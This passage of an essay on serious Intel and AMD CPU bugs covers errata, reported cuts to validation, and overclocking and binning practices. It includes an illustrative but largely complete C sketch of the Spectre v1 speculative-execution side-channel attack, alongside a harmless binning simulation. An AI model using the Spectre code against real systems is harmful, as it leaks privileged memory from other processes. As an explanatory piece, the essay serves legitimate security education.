prime95, a commonly used tool for benchmarking and burn-in, causes their entire system to lock up. Intel's response to this was:
Intel has identified an issue that potentially affects the 6th Gen Intel® Core™ family of products. This issue only occurs under certain complex workload conditions, like those that may be encountered when running applications like Prime95. In those cases, the processor may hang or cause unpredictable system behavior.
which reveals almost nothing about what's actually going on. If you look at their errata list, you'll find that this is typical, except that they normally won't even name the application that was used to trigger the bug. For example, one of the current errata lists has entries like
As we've seen, “unexpected system behavior” can mean that we're completely screwed. Machine checks aren't great either -- they cause Windows to blue screen and Linux to kernel panic. An incorrect address on a page fault is potentially even worse than a mere crash, and if you dig through the list you can find a lot of other scary sounding bugs.
And keep in mind that the Intel errata list has the following disclaimer:
Errata remain in the specification update throughout the product's lifecycle, or until a particular stepping is no longer commercially available. Under these circumstances, errata removed from the specification update are archived and available upon request.
Once they stop manufacturing a stepping (the hardware equivalent of a point release), they reserve the right to remove the errata and you won't be able to find out what errata your older stepping has unless you're important enough to Intel.
Anyway, back to 2015. We've seen at least two serious bugs in Intel CPUs in the last quarter, and it's almost certain there are more bugs lurking. Back when I worked at a company that produced Intel compatible CPUs, we did a fair amount of testing and characterization of Intel CPUs; as someone fresh out of school who'd previously assumed that CPUs basically worked, I was surprised by how many bugs we were able to find. Even though I never worked on the characterization and competitive analysis side of things, I still personally found multiple Intel CPU bugs just in the normal course of doing my job, poking around to verify things that seemed non-obvious to me. Turns out things that seem non-obvious to me are sometimes also non-obvious to Intel engineers.

As more services move to the cloud and the impact of system hang and reset vulnerabilities increases, we'll see more black hats investing time in finding CPU bugs, and we should expect to see a lot more of these once people realize how much easier they are to find than it seems. There was a time when a CPU family might only have one bug per year, with serious bugs happening once every few years, or even once a decade, but we've moved past that. In part, that's because "unpredictable system behavior" bugs have moved from being an annoying class of bugs that forces you to restart your computation to an attack vector that lets anyone with an AWS account attack random cloud-hosted services, but it's mostly because CPUs have gotten more complex, making them more difficult to test and audit effectively, while Intel appears to be cutting back on validation effort. Ironically, we have hardware virtualization that's supposed to help us with security, but the virtualization is so complicated that the hardware virtualization implementation is likely to expose "unpredictable system behavior" bugs that wouldn't otherwise have existed.

This isn't to say it's hopeless -- it's possible, in principle, to design CPUs such that a hang bug on one core doesn't crash the entire system. It's just that it's a fair amount of work to do that at every level (cache directories, the uncore, etc., would have to be modified to operate when a core is hung, as well as OS schedulers). No one's done the work because it hasn't previously seemed important.
You'll often hear software folks say that these things don't matter because they can (sometimes) be patched. But, many devices will never get patched, which means that hardware security bugs will leave some devices vulnerable for their entire lifetime. And even if you don't care about consumers, serious bugs are very bad for CPU vendors. At a company I worked for, we once had a bug escape validation and get found after we shipped. One OEM wouldn't talk to us for something like five years after that, and other OEMs that continued working with us had to re-qualify their parts with our microcode patch and they made sure to let us know how expensive that was. Intel has enough weight that OEMs can't just walk away from them after a bug, but they don't have unlimited political capital and every serious bug uses up political capital, even if it can be patched.
This isn't to say that we should try to get to zero bugs. There's always going to be a tradeoff between development speed and bug rate, and the optimal point probably isn't zero bugs. But we're now regularly seeing severe bugs with security implications, which changes the tradeoff a lot. With something like the FDIV bug, you can argue that it's statistically unlikely that any particular user who doesn't run numerical analysis code will be impacted, but security bugs are different. Attackers don't run random code, so you can't just say that it's unlikely that some condition will occur.
After writing this, a person claiming to be an ex-Intel employee said "even with your privileged access, you have no idea" and a pseudonymous commenter on reddit made this comment:
As someone who worked in an Intel Validation group for SOCs until mid-2014 or so I can tell you, yes, you will see more CPU bugs from Intel than you have in the past from the post-FDIV-bug era until recently.
Why?
Let me set the scene: It's late in 2013. Intel is frantic about losing the mobile CPU wars to ARM. Meetings with all the validation groups. Head honcho in charge of Validation says something to the effect of: "We need to move faster. Validation at Intel is taking much longer than it does for our competition. We need to do whatever we can to reduce those times... we can't live forever in the shadow of the early 90's FDIV bug, we need to move on. Our competition is moving much faster than we are" - I'm paraphrasing. Many of the engineers in the room could remember the FDIV bug and the ensuing problems caused for Intel 20 years prior. Many of us were aghast that someone highly placed would suggest we needed to cut corners in validation - that wasn't explicitly said, of course, but that was the implicit message. That meeting there in late 2013 signaled a sea change at Intel to many of us who were there. And it didn't seem like it was going to be a good kind of sea change. Some of us chose to get out while the getting was good. As someone who worked in an Intel Validation group for SOCs until mid-2014 or so I can tell you, yes, you will see more CPU bugs from Intel than you have in the past from the post-FDIV-bug era until recently.
I haven't been able to confirm this story with another source I personally know, although another anonymous commenter said "I left INTC in mid 2013. From validation. This ... is accurate compared with my experience." Another anonymous person, someone I know, didn't hear that speech, but found that at around that time, "velocity" became a buzzword and management spent a lot of time talking about how Intel needs more "velocity" to compete with ARM, which appears to confirm the sentiment, if not the actual speech.
I've also heard from formal methods people that, around the timeframe mentioned in the first comment, there was an exodus of formal verification folks. One story I've heard is that people left because they were worried about being made redundant. I'm told that, at the time, early retirement packages were being floated around and people strongly suspected layoffs. Another story I've heard is that things got really strange due to Intel's focus on the mobile battle with ARM, and people wanted to leave before things got even worse. But it's hard to say if this means anything, since Intel has been losing a lot of people to Apple because Apple offers better compensation packages and the promise of being less dysfunctional.
I also got anonymous stories about bugs. One person who works in HPC told me that when they were shopping for Haswell parts, a little bird told them that they'd see drastically reduced performance on variants with greater than 12 cores. When they tried building out both 12-core and 16-core systems, they found that they got noticeably better performance on their 12-core systems across a wide variety of workloads. That's not better per-core performance -- that's better absolute performance. Adding 4 more cores reduced the performance on parallel workloads! That was true both in single-socket and two-socket benchmarks.
There's also a mysterious hang during idle/low-activity bug that Intel doesn't seem to have figured out yet.
And then there's this Broadwell bug that hangs Linux if you don't disable low-power states.
And of course Intel isn't the only company with bugs -- this AMD bug found by Robert Swiecki not only allows a VM to crash its host, it also allows a VM to take over the host.
I doubt I've even heard of all the recent bugs and stories about verification/validation. Feel free to send other reports my way.
A number of folks have noticed unusual failure rates in storage devices and switches. This appears to be related to an Intel Atom bug. I find this interesting because the Atom is a relatively simple chip, and therefore a relatively simple chip to verify. When the first-gen Atom was released, folks at Intel seemed proud of how few internal spins were needed to ship a working production chip, something made possible by the simplicity of the design. Modern Atoms are more complicated, but not that much more complicated.
Intel Skylake and Kaby Lake have a hyperthreading bug that's so serious that Debian recommends that users disable hyperthreading to avoid the bug, which can "cause spurious errors, such as application and system misbehavior, data corruption, and data loss".
On the AMD side, there might be a bug that's as serious as any recent Intel CPU bug. If you read that linked thread, you'll see an AMD representative asking people to disable SMT, disable OPCache Control, and change LLC settings to possibly mitigate or narrow down a serious crashing bug. On another thread, you can find someone reporting an #MC exception with "u-op cache crc mismatch".
Although AMD's response in the forum was that these were isolated issues, Phoronix was able to reproduce crashes by running a stress test that consists of compiling a number of open source programs. They report that they were able to get 53 segfaults in one hour of attempted compilation.
Some FreeBSD folks have also noticed seemingly unrelated crashes and have been able to get a reproduction by running code at a high address and then firing an interrupt. This can result in a hang or a crash. The reason this appears to be unrelated to the first reported Ryzen issues is that this is easily reproducible with SMT disabled.
Matt Dillon found an AMD bug triggered by DragonflyBSD, and committed a tiny patch to fix it:
There is a bug in Ryzen related to the kernel iretq'ing into a high user %rip address near the end of the user address space (top of user stack). This is a temporary workaround for the issue.
The original %rip for sigtramp was 0x00007fffffffffe0. Moving it down to fa0 wasn't sufficient. Moving it down to f00 moved the bug from nearly instant to taking a few hours to reproduce. Moving it down to be0 it took a day to reproduce. Moving it down to 0x00007ffffffffba0 (this commit) survived the overnight test.
This is an interesting class of attack that takes advantage of speculative execution plus side channel attacks to leak privileged information into user processes. It seems that at least some of these attacks can be done from JavaScript in the browser.
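For readers who haven't seen what this class of attack looks like, below is a minimal C sketch of the bounds-check-bypass (Spectre variant 1) pattern, modeled on the structure of the publicly documented proof of concept. The names (victim, probe, secret) and the constants are illustrative, and whether any byte actually leaks on a given machine depends on the microarchitecture, the compiler's output, and which mitigations are enabled -- treat it as a shape, not a working exploit.

```c
/* Illustrative sketch of the Spectre v1 (bounds check bypass) pattern,
   following the structure of the publicly released proof of concept.
   Compile on x86-64 with something like: gcc -O1 spectre_sketch.c
   Whether anything actually leaks depends on the CPU, the compiler's
   output, and which mitigations are enabled; this only shows the shape. */
#include <stdint.h>
#include <stdio.h>
#include <x86intrin.h>   /* _mm_clflush, _mm_mfence, __rdtscp */

#define STRIDE 512       /* one cache line per possible byte value, padded */

uint8_t temp;            /* keeps the compiler from optimizing the load away */

static uint8_t  array1[16] = {1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16};
static unsigned array1_size = 16;
static uint8_t  probe[256 * STRIDE];          /* the side-channel "receiver" */
static const char *secret = "hunter2";        /* stand-in for data never read architecturally */

/* The gadget: the bounds check is correct, but the CPU may speculate past it,
   read out of bounds, and use the stolen byte to index probe[], leaving a
   cache footprint that survives after the speculation is rolled back. */
static void victim(size_t x) {
    if (x < array1_size)
        temp &= probe[array1[x] * STRIDE];
}

/* Time a single load to tell whether that probe line is already cached. */
static uint64_t time_access(volatile uint8_t *p) {
    unsigned aux;
    uint64_t t0 = __rdtscp(&aux);
    (void)*p;
    uint64_t t1 = __rdtscp(&aux);
    return t1 - t0;
}

int main(void) {
    size_t malicious_x = (size_t)(secret - (const char *)array1);  /* out-of-bounds offset */

    /* 1. Train the branch predictor with in-bounds calls. */
    for (int i = 0; i < 30; i++)
        victim((size_t)(i % array1_size));

    /* 2. Flush the probe array and the bound so the check resolves slowly. */
    for (int i = 0; i < 256; i++)
        _mm_clflush(&probe[i * STRIDE]);
    _mm_clflush(&array1_size);
    _mm_mfence();

    /* 3. Call with the out-of-bounds index. Architecturally this does nothing,
       but a speculative load may have pulled one probe line into the cache. */
    victim(malicious_x);

    /* 4. See which probe line comes back fastest. */
    uint64_t best = (uint64_t)-1;
    int best_byte = -1;
    for (int b = 0; b < 256; b++) {
        uint64_t t = time_access(&probe[b * STRIDE]);
        if (t < best) { best = t; best_byte = b; }
    }
    printf("fastest probe line corresponds to byte value %d ('%c')\n",
           best_byte, (best_byte >= 32 && best_byte < 127) ? best_byte : '?');
    return 0;
}
```

The point isn't the specific code: it's that the architectural state is untouched while the microarchitectural state (the cache) is not, and the latter can be observed with nothing more than a timer, which is why versions of this can be mounted even from JavaScript in a browser.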
Regarding the comments in the first couple of updates about Intel's recent attitude towards validation, another person claiming to be ex-Intel backs up the statements above:
As a former Intel employee this aligns closely with my experience. I didn't work in validation (actually joined as part of Altera) but velocity is an absolute buzzword and the senior management's approach to complex challenges is sheer panic. Slips in schedules are not tolerated at all - so problems in validation are an existential threat, your project can easily just be canned. Also, because of the size of the company the ways in which quality and completeness are 'acheived' is hugely bureaucratic and rarely reflect true engineering fundamentals.
We're approaching a decade since I wrote this post and the serious CPU bugs keep coming. For example, this recent one was found by RAD Game Tools:
Intel Processor Instability Causing Oodle Decompression Failures
We believe that this is a hardware problem which affects primarily Intel 13900K and 14900K processors, less likely 13700, 14700 and other related processors as well. Only a small fraction of those processors will exhibit this behavior. The problem seems to be caused by a combination of BIOS settings and the high clock rates and power usage of these processors, leading to system instability and unpredictable behavior under heavy load ... Any programs which heavily use the processor on many threads may cause crashes or unpredictable behavior. There have been crashes seen in RealBench, CineBench, Prime95, Handbrake, Visual Studio, and more. This problem can also show up as a GPU error message, such as spurious "out of video memory" errors, even though it is caused by the CPU.
One can argue that this is a configuration bug, but from the standpoint of a typical user, all they observe is that their CPU is causing crashes. And, realistically, Intel knows that their CPUs are shipping into systems with these settings. The mitigation for this involves changing settings like "SVID behavior" → "Intel fail safe"; "Long duration power limit" → reduce to 125W if set higher ("Processor Base Power" on ARK); "Short duration power limit" → reduce to 253W if set higher (for 13900/14900 CPUs; other CPUs have other limits; "Maximum Turbo Power" on ARK); and so on.
If they wanted their CPUs to not crash due to this issue, they could have and should have enforced these settings as well as some others. Instead, they left this up to the BIOS settings, and here we are.
Historically, Intel was much more serious about verification, validation, and testing than AMD, and we saw this in their output. At one point, when a lot of enthusiast sites were excited about AMD (in the K7 days), Google stopped using AMD and basically banned purchases of AMD CPUs because they were so buggy and had caused so many hard-to-debug problems. But, over time, the relative level of verification/validation/test effort Intel allocates has gone down, and Intel seems to have nearly caught up with, or maybe caught up with, AMD in their rate of really serious bugs. Considering Intel's current market position, with very heavy pressure from AMD, ARM, and Nvidia, it seems unlikely that Intel will turn this around in the foreseeable future. Nvidia, historically, has been significantly buggier than AMD or Intel, so Intel still has quite a bit of room to run before it becomes the most buggy major chip manufacturer. Considering that Nvidia is one of the biggest threats to Intel, and how Intel responded to threats from other, then-buggier, manufacturers, it seems like we should expect an even higher rate of bad bugs in the coming decade.
On the specific bug, there's tremendous pressure to operate more like a "move fast and break things" software company than a traditional, conservative CPU manufacturer, for multiple reasons. When you manufacture a CPU, how fast it can run ends up being somewhat random, and there's no reliable way to tell other than testing it, so CPU companies run a set of tests on each part to see how fast it can go. This test time is actually fairly expensive, so there's a lot of work done to try to find the smallest set of tests possible that will correctly determine how fast the CPU can operate. One easy way to cut costs here is to just run fewer tests, even if the smaller set of tests doesn't fully guarantee that the CPU can operate at the speed it's sold at.
Another factor influencing this is that CPUs that are sold as nominally faster can sell for more, so there's also pressure to push CPUs as close to their limits as possible. One way we can see that the margin here has, in general, decreased is by looking at how overclockable CPUs are. People are often happy with their overclocked CPU if they run a few tests, like prime95, stresstest, etc., and their part doesn't crash, but that isn't nearly enough to determine whether the CPU can really run everything a user could throw at it. If you seriously test CPUs (working at an Intel competitor, we would do this regularly), you find that Intel and other CPU companies have really pushed the limit of how fast they claim their CPUs are relative to how fast they actually are, which sometimes results in CPUs being sold that have been pushed beyond their capabilities.
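To make the trade-off in the last two paragraphs concrete, here's a toy Monte Carlo sketch in C. Every number in it -- the frequency spread, the per-test detection curve, the guardband values -- is invented for illustration and not taken from any real binning flow; it only shows the direction of the effect: running fewer tests, or testing with less guardband above the rated speed, ships more parts that can't actually sustain the speed they're sold at.

```c
/* Toy Monte Carlo sketch of speed binning. All numbers and the detection
   curve are invented for illustration; this isn't any real binning flow.
   Each part has a true maximum stable frequency; binning runs a handful of
   short, imperfect tests at the candidate speed. Fewer tests and a smaller
   guardband both cut test cost, and both raise the rate of "escapes":
   parts rated faster than they can actually run.
   Compile with: gcc -O2 binning_sketch.c -lm */
#include <math.h>
#include <stdio.h>
#include <stdlib.h>

static double uniform01(void) { return (rand() + 1.0) / ((double)RAND_MAX + 2.0); }

/* Box-Muller: rough normal sample for the part-to-part frequency spread. */
static double normal(double mean, double sd) {
    double u1 = uniform01(), u2 = uniform01();
    return mean + sd * sqrt(-2.0 * log(u1)) * cos(6.283185307179586 * u2);
}

/* Chance that one short test catches a part that's unstable at f_test:
   the further past its real limit we push it, the easier it is to catch. */
static int test_catches(double true_fmax, double f_test) {
    if (f_test <= true_fmax) return 0;  /* genuinely stable at f_test: nothing to catch */
    double p_catch = 1.0 - exp(-(f_test - true_fmax) / 50.0);  /* made-up curve, MHz scale */
    return uniform01() < p_catch;
}

/* Fraction of shipped parts that are rated above their true stable frequency. */
static double escape_rate(int n_tests, double guardband_mhz) {
    const int n_parts = 200000;
    const double f_rated = 5000.0;                 /* sell-as speed, MHz */
    int shipped = 0, escapes = 0;
    for (int i = 0; i < n_parts; i++) {
        double true_fmax = normal(5050.0, 80.0);   /* hypothetical process spread */
        double f_test = f_rated + guardband_mhz;   /* test a bit above the rated speed */
        int caught = 0;
        for (int t = 0; t < n_tests && !caught; t++)
            caught = test_catches(true_fmax, f_test);
        if (!caught) {
            shipped++;
            if (true_fmax < f_rated) escapes++;    /* sold faster than it can really run */
        }
    }
    return shipped ? (double)escapes / shipped : 0.0;
}

int main(void) {
    srand(1);
    printf("1 test,  no guardband:      %.2f%% escapes\n", 100 * escape_rate(1, 0));
    printf("5 tests, no guardband:      %.2f%% escapes\n", 100 * escape_rate(5, 0));
    printf("1 test,  100 MHz guardband: %.2f%% escapes\n", 100 * escape_rate(1, 100));
    printf("5 tests, 100 MHz guardband: %.2f%% escapes\n", 100 * escape_rate(5, 100));
    return 0;
}
```

Cutting test time and shrinking guardband both show up as real money for the manufacturer, while the escapes show up later, as crashes on someone else's machine.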
On overclocking, as Fabian Giesen of RAD notes,
This stuff is not sanctioned and will count as overclocking if you try to RMA it but it's sold as a major feature of the platform and review sites test with it on.
Daniel Gibson replied with
hmm on my mainboard (ASUS ROG Strix B550-A Gaming -clearly gaming hardware, but middle price range) I had to explicitly enable the XMP/EXPO profile for the DDR4-RAM to run at full speed - which is DDR4-3200, officially supported by the CPU (Ryzen 5950X). Otherwise it ran at DDR4-2400 speed, I think? Or was it 2133? I forgot, at least significantly lower
To which Fabian noted
Correct. Fun fact: turning on EXPO technically voids your warranty ... t's great; both the CPU and the RAM list it as supported but it's officially not.
One might call it a racket, if one were inclined to such incisive language.
Intel didn't use to officially unofficially support this kind of thing. And, more generally, CPU manufacturers historically were very hesitant to ship parts that had a non-negligible risk of crashes and data corruption when used as intended if they could avoid it, but more and more of these bugs keep happening. Some end up becoming quite public, like this one, because someone publishes a report about them, like the RAD report above. And some get quietly reported to the CPU manufacturer by a huge company, often under some kind of NDA, where the big company gets replacement CPUs and Intel or another manufacturer quietly ships firmware fixes for the issue. And it surely must be the case that some of these aren't really caught at all, unless you count the occasional data corruption or crash as being caught.
Thanks to Leah Hanson, Jeff Ligouri, Derek Slager, Ralph Corderoy, Joe Wilder, Nate Martin, Hari Angepat, JonLuca De Caro, Jeff Fowler, and a number of anonymous tipsters for comments/corrections/discussion.